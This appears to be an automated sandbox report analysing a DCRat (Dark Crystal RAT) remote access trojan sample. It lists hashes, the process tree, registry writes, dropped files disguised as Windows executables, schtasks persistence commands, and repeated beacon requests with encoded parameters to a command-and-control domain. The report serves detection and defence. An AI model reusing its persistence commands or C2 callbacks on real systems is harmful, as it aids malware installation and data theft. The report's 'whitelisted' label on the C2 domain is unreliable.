File name: | DCRatBuild.exe |
Full analysis: | https://app.any.run/tasks/7c61371f-2436-4610-8bf3-38aa42d7def7 |
Verdict: | Malicious activity |
Threats: | DCrat, also known as Dark Crystal RAT, is a remote access trojan (RAT), which was first introduced in 2018. It is a modular malware that can be customized to perform different tasks. For instance, it can steal passwords, crypto wallet information, hijack Telegram and Steam accounts, and more. Attackers may use a variety of methods to distribute DCrat, but phishing email campaigns are the most common. |
Analysis date: | January 10, 2025, 21:17:23 |
OS: | Windows 10 Professional (build: 19045, 64 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.microsoft.portable-executable |
File info: | PE32 executable (GUI) Intel 80386, for MS Windows, 6 sections |
MD5: | 518D0AA5E39A3F9719EE24B749874CDD |
SHA1: | 0E5B22A0B89767587876E1B36E0E8FC2FCB4E524 |
SHA256: | 1BC34DDE181115BBD21149823170AC3FC0D70009ACD2CB75D48D54736F68E108 |
SSDEEP: | 12288:VWjGLA4uDgDZrLWkzDNhCa287MochrSvUJZVVVVVVVVVAtVVVUvPIwuZJSxqZRCp:HZPrK87M5rSv0lvPZuvCxaC |
.exe | | | Win32 Executable (generic) (52.9) |
---|---|---|
.exe | | | Generic Win/DOS Executable (23.5) |
.exe | | | DOS Executable Generic (23.5) |
Subsystem: | Windows GUI |
---|---|
SubsystemVersion: | 5.1 |
ImageVersion: | - |
OSVersion: | 5.1 |
EntryPoint: | 0x1ec40 |
UninitializedDataSize: | - |
InitializedDataSize: | 255488 |
CodeSize: | 201216 |
LinkerVersion: | 14 |
PEType: | PE32 |
ImageFileCharacteristics: | Executable, 32-bit |
TimeStamp: | 2020:12:01 18:00:55+00:00 |
MachineType: | Intel 386 or later, and compatibles |
PID | CMD | Path | Indicators | Parent process | |||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
4864 | "C:\Users\admin\AppData\Local\Temp\DCRatBuild.exe" | C:\Users\admin\AppData\Local\Temp\DCRatBuild.exe | explorer.exe | ||||||||||||
User: admin Integrity Level: MEDIUM Exit code: 0 Modules
| |||||||||||||||
6232 | "C:\WINDOWS\System32\WScript.exe" "C:\SurrogateSessioncommon\H64kBfMKQNZHGYpAaq8bCkBE8.vbe" | C:\Windows\SysWOW64\wscript.exe | — | DCRatBuild.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.812.10240.16384 Modules
| |||||||||||||||
6784 | C:\WINDOWS\system32\cmd.exe /c ""C:\SurrogateSessioncommon\thbmTw2pjRZvcHsUGy.bat" " | C:\Windows\SysWOW64\cmd.exe | — | wscript.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.3636 (WinBuild.160101.0800) Modules
| |||||||||||||||
6796 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
6844 | "C:\SurrogateSessioncommon\chainreview.exe" | C:\SurrogateSessioncommon\chainreview.exe | cmd.exe | ||||||||||||
User: admin Integrity Level: MEDIUM Exit code: 0 Version: 5.15.2.0 Modules
| |||||||||||||||
6952 | schtasks.exe /create /tn "SystemSettingsS" /sc MINUTE /mo 6 /tr "'C:\SurrogateSessioncommon\SystemSettings.exe'" /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Task Scheduler Configuration Tool Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
6972 | schtasks.exe /create /tn "SystemSettings" /sc ONLOGON /tr "'C:\SurrogateSessioncommon\SystemSettings.exe'" /rl HIGHEST /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Task Scheduler Configuration Tool Exit code: 1 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
6988 | schtasks.exe /create /tn "SystemSettingsS" /sc MINUTE /mo 6 /tr "'C:\SurrogateSessioncommon\SystemSettings.exe'" /rl HIGHEST /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Task Scheduler Configuration Tool Exit code: 1 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
7012 | schtasks.exe /create /tn "MusNotificationM" /sc MINUTE /mo 7 /tr "'C:\SurrogateSessioncommon\MusNotification.exe'" /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Task Scheduler Configuration Tool Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
7036 | schtasks.exe /create /tn "MusNotification" /sc ONLOGON /tr "'C:\SurrogateSessioncommon\MusNotification.exe'" /rl HIGHEST /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Task Scheduler Configuration Tool Exit code: 1 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
|
(PID) Process: | (4864) DCRatBuild.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.vbe\OpenWithProgids |
Operation: | write | Name: | VBEFile |
Value: | |||
(PID) Process: | (6844) chainreview.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\ede9d3f1760488ad72f81ec33ce28456947fd121 |
Operation: | write | Name: | 7a7bef15d456479a31a6f1ab24c47bd316c632f5 |
Value: WyJDOlxcU3Vycm9nYXRlU2Vzc2lvbmNvbW1vblxcY2hhaW5yZXZpZXcuZXhlIiwiQzpcXFN1cnJvZ2F0ZVNlc3Npb25jb21tb25cXFN5c3RlbVNldHRpbmdzLmV4ZSIsIkM6XFxTdXJyb2dhdGVTZXNzaW9uY29tbW9uXFxNdXNOb3RpZmljYXRpb24uZXhlIiwiQzpcXFN1cnJvZ2F0ZVNlc3Npb25jb21tb25cXFN5c3RlbVNldHRpbmdzLmV4ZSIsIkM6XFxVc2Vyc1xcRGVmYXVsdFxcVmlkZW9zXFxTeXN0ZW1TZXR0aW5ncy5leGUiLCJDOlxcU3Vycm9nYXRlU2Vzc2lvbmNvbW1vblxcc3Bvb2xzdi5leGUiLCJDOlxcU3Vycm9nYXRlU2Vzc2lvbmNvbW1vblxcZHdtLmV4ZSIsIkM6XFxTdXJyb2dhdGVTZXNzaW9uY29tbW9uXFx3aW5pbml0LmV4ZSIsIkM6XFxTdXJyb2dhdGVTZXNzaW9uY29tbW9uXFxkd20uZXhlIiwiQzpcXFN1cnJvZ2F0ZVNlc3Npb25jb21tb25cXHRhc2tob3N0dy5leGUiLCJDOlxcU3Vycm9nYXRlU2Vzc2lvbmNvbW1vblxcY3RmbW9uLmV4ZSIsIkM6XFxTdXJyb2dhdGVTZXNzaW9uY29tbW9uXFxPZmZpY2VDbGlja1RvUnVuLmV4ZSIsIkM6XFxTdXJyb2dhdGVTZXNzaW9uY29tbW9uXFxiYWNrZ3JvdW5kVGFza0hvc3QuZXhlIiwiQzpcXFVzZXJzXFxQdWJsaWNcXERvY3VtZW50c1xcd2luaW5pdC5leGUiLCJDOlxcU3Vycm9nYXRlU2Vzc2lvbmNvbW1vblxcZm9udGRydmhvc3QuZXhlIiwiQzpcXFN1cnJvZ2F0ZVNlc3Npb25jb21tb25cXGNvbmhvc3QuZXhlIl0= | |||
(PID) Process: | (3928) ctfmon.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\ctfmon_RASAPI32 |
Operation: | write | Name: | EnableFileTracing |
Value: 0 | |||
(PID) Process: | (3928) ctfmon.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\ctfmon_RASAPI32 |
Operation: | write | Name: | EnableAutoFileTracing |
Value: 0 | |||
(PID) Process: | (3928) ctfmon.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\ctfmon_RASAPI32 |
Operation: | write | Name: | EnableConsoleTracing |
Value: 0 | |||
(PID) Process: | (3928) ctfmon.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\ctfmon_RASAPI32 |
Operation: | write | Name: | FileTracingMask |
Value: | |||
(PID) Process: | (3928) ctfmon.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\ctfmon_RASAPI32 |
Operation: | write | Name: | ConsoleTracingMask |
Value: | |||
(PID) Process: | (3928) ctfmon.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\ctfmon_RASAPI32 |
Operation: | write | Name: | MaxFileSize |
Value: 1048576 | |||
(PID) Process: | (3928) ctfmon.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\ctfmon_RASAPI32 |
Operation: | write | Name: | FileDirectory |
Value: %windir%\tracing | |||
(PID) Process: | (3928) ctfmon.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\ctfmon_RASMANCS |
Operation: | write | Name: | EnableFileTracing |
Value: 0 |
PID | Process | Filename | Type | |
---|---|---|---|---|
6844 | chainreview.exe | C:\Users\Default\Videos\SystemSettings.exe | executable | |
MD5:D209FBBD47A895FF722028B81C204926 | SHA256:2A4A668C5560121458A63D15075EB9512929A279F30ED2B29B62C2342B5EA743 | |||
6844 | chainreview.exe | C:\SurrogateSessioncommon\wininit.exe | executable | |
MD5:D209FBBD47A895FF722028B81C204926 | SHA256:2A4A668C5560121458A63D15075EB9512929A279F30ED2B29B62C2342B5EA743 | |||
6844 | chainreview.exe | C:\SurrogateSessioncommon\SystemSettings.exe | executable | |
MD5:D209FBBD47A895FF722028B81C204926 | SHA256:2A4A668C5560121458A63D15075EB9512929A279F30ED2B29B62C2342B5EA743 | |||
6844 | chainreview.exe | C:\SurrogateSessioncommon\dwm.exe | executable | |
MD5:D209FBBD47A895FF722028B81C204926 | SHA256:2A4A668C5560121458A63D15075EB9512929A279F30ED2B29B62C2342B5EA743 | |||
6844 | chainreview.exe | C:\SurrogateSessioncommon\26c12092da979c | text | |
MD5:FEE6EB484C1F8A8313C9941832AA4C32 | SHA256:20C0A030BB30744AF1ECE0BD17E4514B0E87989E9455EEFC38D7188A439E1FAB | |||
6844 | chainreview.exe | C:\SurrogateSessioncommon\ctfmon.exe | executable | |
MD5:D209FBBD47A895FF722028B81C204926 | SHA256:2A4A668C5560121458A63D15075EB9512929A279F30ED2B29B62C2342B5EA743 | |||
6844 | chainreview.exe | C:\SurrogateSessioncommon\ea9f0e6c9e2dcd | text | |
MD5:D1B51C4E8E3F810737512BF0A5C1AD3A | SHA256:8B95DFE1948124757E76CD331A9B75CEBFCBC8B2708A46F072C8BC0B0E43F4E3 | |||
6844 | chainreview.exe | C:\SurrogateSessioncommon\MusNotification.exe | executable | |
MD5:D209FBBD47A895FF722028B81C204926 | SHA256:2A4A668C5560121458A63D15075EB9512929A279F30ED2B29B62C2342B5EA743 | |||
6844 | chainreview.exe | C:\SurrogateSessioncommon\f3b6ecef712a24 | text | |
MD5:AE6C5D21734D22555E98864605B9973A | SHA256:05C0E70D8A92B44C3135E83C5F314F8B3F18CBE081C5F9AC9D6640C7664B4781 | |||
6844 | chainreview.exe | C:\SurrogateSessioncommon\aa97147c4c782d | text | |
MD5:2109D38BFCC0A1B0BC2D4F3587B6FBCB | SHA256:7AB5B902C416B487BD4D8BA0A1FE62AE9E527C2F783FFEBB5FECCC69A0BF7B0F |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3928 | ctfmon.exe | GET | 200 | 94.198.223.74:80 | http://cx10442.tw1.ru/f18a42f1.php?BiQVNycGVjx9i3Qoj=fgYeDVFV9hNC4Q7&c9de10862b73241675360169003c1342=QOmR2MxcTY5MTMhRjY3QDZwMzYjRDZxQWN3IWMkN2MmhjYhR2NkJDM0UzNwYjMzgjMzgjM1kjN&3064f13b6f0e3ee9f68f8160f6c5065b=gMwY2YxYzNwEWOxUmYzcjNiJTZyEWZkZmNygDMlR2MiNmZyQWN3ADM&f2412832b8db191734a6421eea1e0a91=d1nI2MWN0gTZ4kTY1IjNzUzM1gzY4MmMyEjNjFGMlZmNjNTMlNDM5czYhJiOikTM2cTYjFTZyEWM2UDMkVjY2QTMiVWZzcDZldTMhBTOiwiIxIWY0EDNmhDNlVDMzUmN4MGNiZjN1YWZyMjZ4AjY2MjYlhDOmJTN5IiOiUTZzQmYlRTM0MmY0kzNhVzNllTZjRGN1UTNzMDM1kzYis3W&245d677051a5fd9542fc1d9be47be37f=0VfiIiOiETMmZTNldzN5QTMkVDO1MmM2gjNiVWO1QGMhJGOwITNiwiI2MWN0gTZ4kTY1IjNzUzM1gzY4MmMyEjNjFGMlZmNjNTMlNDM5czYhJiOikTM2cTYjFTZyEWM2UDMkVjY2QTMiVWZzcDZldTMhBTOiwiIxIWY0EDNmhDNlVDMzUmN4MGNiZjN1YWZyMjZ4AjY2MjYlhDOmJTN5IiOiUTZzQmYlRTM0MmY0kzNhVzNllTZjRGN1UTNzMDM1kzYisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXSTplMsdEZqZ0aJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzlUaUl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJZHZXllasdUYElzUZpGbtNGbxcVUp9maJxWNyImNWdlYwJlbJNXSD10dBRUT3FkaJZTSDJGaSNzY2JkbJNXS5NGbShVWw4kRJtmVHRGc1clVnBzQJtmVXFWbsJTWsJ0MjdWUzI2TKl2TpNWbjZnSDxUaJpWT0QTeOVDMDxEeVpnT1NmeNl2bqlka5ckYpdXaJRlVslkNJNVZ5JlbiFTOykVa3lWSp9maJVXOXFmbW12YpdXaJl2bqlUNShVYqp0QMl2YE1Ue0kXT4lkaMBTSqxkMFpWTp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS1x2VitmRtlkNJNlW0ZUbUlnVyMmVKNETpFVRUtEeFRFSwVFTRlTRWxkTWJVRKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiETMmZTNldzN5QTMkVDO1MmM2gjNiVWO1QGMhJGOwITNiwiI1cTNyIjYkJTY2IWNjBTZ1cjN2EGMyMWOxEzY2MDOwUGMkZWM4MWYlJiOikTM2cTYjFTZyEWM2UDMkVjY2QTMiVWZzcDZldTMhBTOiwiIxIWY0EDNmhDNlVDMzUmN4MGNiZjN1YWZyMjZ4AjY2MjYlhDOmJTN5IiOiUTZzQmYlRTM0MmY0kzNhVzNllTZjRGN1UTNzMDM1kzYis3W | unknown | — | — | whitelisted |
3928 | ctfmon.exe | GET | 200 | 94.198.223.74:80 | http://cx10442.tw1.ru/f18a42f1.php?BiQVNycGVjx9i3Qoj=fgYeDVFV9hNC4Q7&c9de10862b73241675360169003c1342=QOmR2MxcTY5MTMhRjY3QDZwMzYjRDZxQWN3IWMkN2MmhjYhR2NkJDM0UzNwYjMzgjMzgjM1kjN&3064f13b6f0e3ee9f68f8160f6c5065b=gMwY2YxYzNwEWOxUmYzcjNiJTZyEWZkZmNygDMlR2MiNmZyQWN3ADM&f2412832b8db191734a6421eea1e0a91=d1nI2MWN0gTZ4kTY1IjNzUzM1gzY4MmMyEjNjFGMlZmNjNTMlNDM5czYhJiOikTM2cTYjFTZyEWM2UDMkVjY2QTMiVWZzcDZldTMhBTOiwiIxIWY0EDNmhDNlVDMzUmN4MGNiZjN1YWZyMjZ4AjY2MjYlhDOmJTN5IiOiUTZzQmYlRTM0MmY0kzNhVzNllTZjRGN1UTNzMDM1kzYis3W&245d677051a5fd9542fc1d9be47be37f=0VfiIiOiETMmZTNldzN5QTMkVDO1MmM2gjNiVWO1QGMhJGOwITNiwiI2MWN0gTZ4kTY1IjNzUzM1gzY4MmMyEjNjFGMlZmNjNTMlNDM5czYhJiOikTM2cTYjFTZyEWM2UDMkVjY2QTMiVWZzcDZldTMhBTOiwiIxIWY0EDNmhDNlVDMzUmN4MGNiZjN1YWZyMjZ4AjY2MjYlhDOmJTN5IiOiUTZzQmYlRTM0MmY0kzNhVzNllTZjRGN1UTNzMDM1kzYisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXSTplMsdEZqZ0aJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzlUaUl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJZHZXllasdUYElzUZpGbtNGbxcVUp9maJxWNyImNWdlYwJlbJNXSD10dBRUT3FkaJZTSDJGaSNzY2JkbJNXS5NGbShVWw4kRJtmVHRGc1clVnBzQJtmVXFWbsJTWsJ0MjdWUzI2TKl2TpNWbjZnSDxUaJpWT0QTeOVDMDxEeVpnT1NmeNl2bqlka5ckYpdXaJRlVslkNJNVZ5JlbiFTOykVa3lWSp9maJVXOXFmbW12YpdXaJl2bqlUNShVYqp0QMl2YE1Ue0kXT4lkaMBTSqxkMFpWTp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS1x2VitmRtlkNJNlW0ZUbUlnVyMmVKNETpFVRUtEeFRFSwVFTRlTRWxkTWJVRKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiETMmZTNldzN5QTMkVDO1MmM2gjNiVWO1QGMhJGOwITNiwiI1cTNyIjYkJTY2IWNjBTZ1cjN2EGMyMWOxEzY2MDOwUGMkZWM4MWYlJiOikTM2cTYjFTZyEWM2UDMkVjY2QTMiVWZzcDZldTMhBTOiwiIxIWY0EDNmhDNlVDMzUmN4MGNiZjN1YWZyMjZ4AjY2MjYlhDOmJTN5IiOiUTZzQmYlRTM0MmY0kzNhVzNllTZjRGN1UTNzMDM1kzYis3W | unknown | — | — | whitelisted |
3928 | ctfmon.exe | GET | 200 | 94.198.223.74:80 | http://cx10442.tw1.ru/f18a42f1.php?BiQVNycGVjx9i3Qoj=fgYeDVFV9hNC4Q7&c9de10862b73241675360169003c1342=QOmR2MxcTY5MTMhRjY3QDZwMzYjRDZxQWN3IWMkN2MmhjYhR2NkJDM0UzNwYjMzgjMzgjM1kjN&3064f13b6f0e3ee9f68f8160f6c5065b=gMwY2YxYzNwEWOxUmYzcjNiJTZyEWZkZmNygDMlR2MiNmZyQWN3ADM&32b56fe672c0b08595e6e68bdec51114=d1nIw4WS1lzViRXOykVd5cVY65EWaRlVHRGakJjY5pEWkRFeGhlNNtWS2k0QhBjRHVVa3lWS1R2MiVHdtJmVKl2Tpd2RkhmQGpVe5ITW6x2RSl2dplUavpWSvJFWZFVMXlVekdlWzZ1RWl2dplUavpWS6JESjJUMXlFbSNTVpdXaJVHZzIWd01mYWpUaPlWUVNVeWJzYWFzVZxmUzUVa3lWS1R2MiVHdtJmVKl2TplEWapnVWJGaWdEZUp0QMlGNyQmd1ITY1ZFbJZTS5pVdGdEV0Z0VaBjTsl0cJlmYzkTbiJXNXZVavpWSvJFWZFVMXlFbSNTVpdXaJZHbHpVMGVUSzsmeKRkRFlkcWdEZzZ0VaNlQTxUenNUS1xWRJxWNXFWT1cEW5hnVkJkQ55UNjlXUCJUehxmUIJGaW1WVnBTaN9WQTpVd5cUY3lTbjpGbXRVavpWS6ZVbiZHaHNmdKNTWwFzaJNXSplkNJl3Y0ZkMZlmVyYVa3lWS1hHbjNmRUdlQ4VUVUxWRSNGesx0Y4ZEWjpUaPlWTuJGbW12Yq5EbJNXS5tEN0MkTp9maJVXOXFmeKhlWXRXbjZHZYpFdG12YHpUelJiOiETMmZTNldzN5QTMkVDO1MmM2gjNiVWO1QGMhJGOwITNiwiIyEDZ5UjN5kzN0UmM1UDNkVDZzIDZjNmNkJDN4I2YhZGOmRjN1E2N4IiOikTM2cTYjFTZyEWM2UDMkVjY2QTMiVWZzcDZldTMhBTOiwiIxIWY0EDNmhDNlVDMzUmN4MGNiZjN1YWZyMjZ4AjY2MjYlhDOmJTN5IiOiUTZzQmYlRTM0MmY0kzNhVzNllTZjRGN1UTNzMDM1kzYis3W | unknown | — | — | whitelisted |
3928 | ctfmon.exe | GET | 200 | 94.198.223.74:80 | http://cx10442.tw1.ru/f18a42f1.php?ISU=MhWGysGoR44GhWLI&f5P2y52TogCn0IWP8=8CYOm9qsmT6&4vwgnWEmXmdwK=DBawh0j&bb81c8057f2c5b5ed285ced0baf70984=7f270665d876fbb66f03738bf08cdd54&3064f13b6f0e3ee9f68f8160f6c5065b=wYkFWNmhTYxYjMjZ2NmdTMxMmM3QzYzMzNlhTY1czN1MWZ2cTZhhDN&ISU=MhWGysGoR44GhWLI&f5P2y52TogCn0IWP8=8CYOm9qsmT6&4vwgnWEmXmdwK=DBawh0j | unknown | — | — | whitelisted |
1176 | svchost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | — | — | whitelisted |
4712 | MoUsoCoreWorker.exe | GET | 200 | 2.16.241.12:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
5064 | SearchApp.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D | unknown | — | — | whitelisted |
7144 | SIHClient.exe | GET | 200 | 23.52.120.96:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | — | — | whitelisted |
4712 | MoUsoCoreWorker.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
3928 | ctfmon.exe | GET | 200 | 94.198.223.74:80 | http://cx10442.tw1.ru/f18a42f1.php?BiQVNycGVjx9i3Qoj=fgYeDVFV9hNC4Q7&c9de10862b73241675360169003c1342=QOmR2MxcTY5MTMhRjY3QDZwMzYjRDZxQWN3IWMkN2MmhjYhR2NkJDM0UzNwYjMzgjMzgjM1kjN&3064f13b6f0e3ee9f68f8160f6c5065b=gMwY2YxYzNwEWOxUmYzcjNiJTZyEWZkZmNygDMlR2MiNmZyQWN3ADM&f2412832b8db191734a6421eea1e0a91=d1nI2MWN0gTZ4kTY1IjNzUzM1gzY4MmMyEjNjFGMlZmNjNTMlNDM5czYhJiOikTM2cTYjFTZyEWM2UDMkVjY2QTMiVWZzcDZldTMhBTOiwiIxIWY0EDNmhDNlVDMzUmN4MGNiZjN1YWZyMjZ4AjY2MjYlhDOmJTN5IiOiUTZzQmYlRTM0MmY0kzNhVzNllTZjRGN1UTNzMDM1kzYis3W&245d677051a5fd9542fc1d9be47be37f=0VfiIiOiETMmZTNldzN5QTMkVDO1MmM2gjNiVWO1QGMhJGOwITNiwiI2MWN0gTZ4kTY1IjNzUzM1gzY4MmMyEjNjFGMlZmNjNTMlNDM5czYhJiOikTM2cTYjFTZyEWM2UDMkVjY2QTMiVWZzcDZldTMhBTOiwiIxIWY0EDNmhDNlVDMzUmN4MGNiZjN1YWZyMjZ4AjY2MjYlhDOmJTN5IiOiUTZzQmYlRTM0MmY0kzNhVzNllTZjRGN1UTNzMDM1kzYisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXSTplMsdEZqZ0aJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzlUaUl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJZHZXllasdUYElzUZpGbtNGbxcVUp9maJxWNyImNWdlYwJlbJNXSD10dBRUT3FkaJZTSDJGaSNzY2JkbJNXS5NGbShVWw4kRJtmVHRGc1clVnBzQJtmVXFWbsJTWsJ0MjdWUzI2TKl2TpNWbjZnSDxUaJpWT0QTeOVDMDxEeVpnT1NmeNl2bqlka5ckYpdXaJRlVslkNJNVZ5JlbiFTOykVa3lWSp9maJVXOXFmbW12YpdXaJl2bqlUNShVYqp0QMl2YE1Ue0kXT4lkaMBTSqxkMFpWTp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS1x2VitmRtlkNJNlW0ZUbUlnVyMmVKNETpFVRUtEeFRFSwVFTRlTRWxkTWJVRKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiETMmZTNldzN5QTMkVDO1MmM2gjNiVWO1QGMhJGOwITNiwiI1cTNyIjYkJTY2IWNjBTZ1cjN2EGMyMWOxEzY2MDOwUGMkZWM4MWYlJiOikTM2cTYjFTZyEWM2UDMkVjY2QTMiVWZzcDZldTMhBTOiwiIxIWY0EDNmhDNlVDMzUmN4MGNiZjN1YWZyMjZ4AjY2MjYlhDOmJTN5IiOiUTZzQmYlRTM0MmY0kzNhVzNllTZjRGN1UTNzMDM1kzYis3W | unknown | — | — | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
— | — | 192.168.100.255:137 | — | — | — | whitelisted |
4536 | svchost.exe | 52.167.17.97:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
— | — | 52.167.17.97:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
4712 | MoUsoCoreWorker.exe | 2.16.241.12:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
4712 | MoUsoCoreWorker.exe | 95.101.149.131:80 | www.microsoft.com | Akamai International B.V. | NL | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
5064 | SearchApp.exe | 2.23.227.215:443 | www.bing.com | Ooredoo Q.S.C. | QA | whitelisted |
1076 | svchost.exe | 2.23.242.9:443 | go.microsoft.com | Ooredoo Q.S.C. | QA | whitelisted |
5064 | SearchApp.exe | 192.229.221.95:80 | ocsp.digicert.com | EDGECAST | US | whitelisted |
1176 | svchost.exe | 20.190.159.2:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
Domain | IP | Reputation |
---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
google.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
www.bing.com |
| whitelisted |
go.microsoft.com |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
login.live.com |
| whitelisted |
cx10442.tw1.ru |
| whitelisted |
slscr.update.microsoft.com |
| whitelisted |
PID | Process | Class | Message |
---|---|---|---|
— | — | A Network Trojan was detected | ET MALWARE DCRAT Activity (GET) |